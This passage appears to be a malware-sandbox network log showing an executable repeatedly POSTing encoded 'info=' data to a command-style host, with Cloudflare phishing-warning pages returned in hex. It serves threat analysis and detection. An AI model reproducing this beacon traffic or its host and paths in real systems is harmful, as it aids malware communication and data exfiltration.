3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:38:58.209351063 CET	631	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.209429026 CET	631	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 54 73 53 51 77 4d 54 49 33 54 34 75 51 75 36 42 57 4d 67 78 70 67 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTsSQwMTI3T4uQu6BWMgxpg~
Jan 29, 2021 17:38:58.264574051 CET	633	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2dc70000722de513d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JdIGm0HRyN6TmoSouRicUz8GfAA2HWr7izc91aOmOjRxyh2jhFYR5yNkdtmWkFWvCuEMfAAsSdyFPwIzrFONpb2meMEyMMnX5uLHflgX%2Bpa5HkS2Rg%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f60fc3722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:38:58.266551018 CET	637	OUT	GET /info_old/r HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.319027901 CET	639	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2e000000722de9acb000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3BF6MsVzUm%2BiKRPPF%2B4BTQEMKHBP5v0DntkQQxydAste4RKwERxEQTDedOV9mtMIEdcfBZu6ISIX5alRxSygxXrEAr2hXe7tbga46N4b4y81UJuBwA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f66fe9722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:39:15.366708040 CET	1191	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:39:15.366833925 CET	1191	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:15.638581038 CET	1191	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:15.951106071 CET	1192	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:16.560844898 CET	1193	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:17.779493093 CET	1211	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xy Data Raw: Data Ascii:
Jan 29, 2021 17:39:17.868499041 CET	1211	OUT	Data Raw: 0d 0a 0d 0a 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:17.942154884 CET	1213	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:39:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dbcccb0326f30df5ee2ada287f6033e851611938357; expires=Sun, 28-Feb-21 16:39:17 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c7a910000722de2251000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5jwELGRBcFgHzEg%2FJqjKprpf%2F17zeJUpjwDtj4f7AAl9korLlxe%2BFfP3qD%2B0hhkFUSup%2BlKCwjgLkU2r5KVgB4uXMQI0pLdYEG0x9RKrvDOyLRSAWA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619463705d70722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49722	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:38:48.794128895 CET	264	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:48.794214964 CET	265	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 5a 71 41 6c 37 6f 41 47 6b 49 49 72 67 68 6a 57 58 33 49 71 4c 4d 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVZqAl7oAGkIIrghjWX3IqLM~
Jan 29, 2021 17:38:48.865298986 CET	266	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d8ac9d532fed68827556afccc307639011611938328; expires=Sun, 28-Feb-21 16:38:48 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c08fe00001feafe098000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Dl4Rc1p6KRg7Z6nRmR5OluCLpeK6Ba9C7APa3fSgd2LFvwnpp8H1kTEaMT2ZTS3jWsXjOSb8zKXZBkxwIKgMtMEnbdmJbdm5L7uJV9jNjL0VDx1NSg%3D%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619462bb39ec1fea-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
